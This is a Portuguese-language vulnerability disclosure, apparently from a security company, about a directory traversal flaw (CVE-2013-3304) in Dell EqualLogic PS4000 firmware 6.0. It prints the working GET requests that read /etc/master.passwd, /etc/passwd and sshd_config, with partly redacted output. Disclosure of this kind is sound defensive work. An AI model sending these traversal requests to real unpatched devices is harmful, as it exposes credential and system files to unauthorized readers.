A seguir, iremos demonstrar a falha em sistemas de Storages EqualLogic descoberta por nossa empresa e reportada a empresa Dell, segundo informações da Dell esta falha foi consertada em uma nova versão de firmware.
Descrição da plataforma segundo o fabricante
Produtos EqualLogic são sistemas baseados em iSCSI Storage Area Network (SAN) comercializados pela Dell.
Interface web do Storage
A falha de segurança
# Software: Dell EqualLogic
# Versão: 6.0
# Empresa: Dell Computers
# Website: www.dell.com
# Vulnerabilidade: Directory Traversal
# CVE: CVE-2013-3304
# Autor: Mauricio Corrêa
## Informações Adicionais ##
Modelo do Equipamento Testado: Dell EqualLogic PS4000
http://www.dell.com/br/empresa/p/equallogic-ps4000e/pd
Firmware Version: 6.0
#########################################################################
O usuário malicioso envia requisições mal formadas para acessar arquivos sensíveis dentro do sistema operacional do Hardware, possibilitando a quebra da segurança do NAS Storage.
GET //../../../../../../../../etc/master.passwd
root:[hash] &:/root:/bin/sh
daemon:*:[hash]::0:0:The devil himself:/:/sbin/nologin
operator:*:[hash]::0:0:System &:/usr/guest/operator:/sbin/nologin
bin:*:[hash]::0:0:Binaries Commands and Source:/:/sbin/nologin
sshd:*:[hash]:0:0:SSH pseudo-user:/var/chroot/sshd:/sbin/nologin
uucp:*:[hash]:UNIX-to-UNIX Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico
nobody:*:[hash]:Unprivileged user:/nonexistent:/sbin/nologin
grpadmin:[hash]:Group Manager Admin Account:/mgtdb/update:/usr/bin/Cli
authgroup:[hash]:Group Authenication Account:/:/sbin/nologin
GET //../../../../../../../../etc/passwd
root:*:[hash]:Charlie &:/root:/bin/sh
daemon:*:[hash]:The devil himself:/:/sbin/nologin
operator:*:[hash]:System &:/usr/guest/operator:/sbin/nologin
bin:*::Binaries Commands and Source:/:/sbin/nologin
sshd:*:[hash]:SSH pseudo-user:/var/chroot/sshd:/sbin/nologin
uucp:*[hash]:1:UNIX-to-UNIX Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico
nobody:*:[hash]:Unprivileged user:/nonexistent:/sbin/nologin
grpadmin:*:[hash]Group Manager Admin Account:/mgtdb/update:/usr/bin/Cli
authgroup:*:[hash]0:Group Authenication Account:/:/sbin/nologin
Como foi possível perceber, a falha é grave porém não é crítica, ainda não sabemos a extensão da falha pois o escopo foi limitado nestes testes, nota-se que arquivos de configurações de todo o sistema podem ser lidos.
O sistema em si trata-se de um NetBSD podendo ser constatado lendo o arquivo de configuração do SSHD:
GET //../../../../../../../../etc/ssh/sshd_config HTTP/1.1
# $NetBSD: sshd_config,v 1.16 2002/10/01 14:07:47 itojun Exp $
A falha foi corrigida na nova versão dos firmwares da linha EqualLogic da Dell.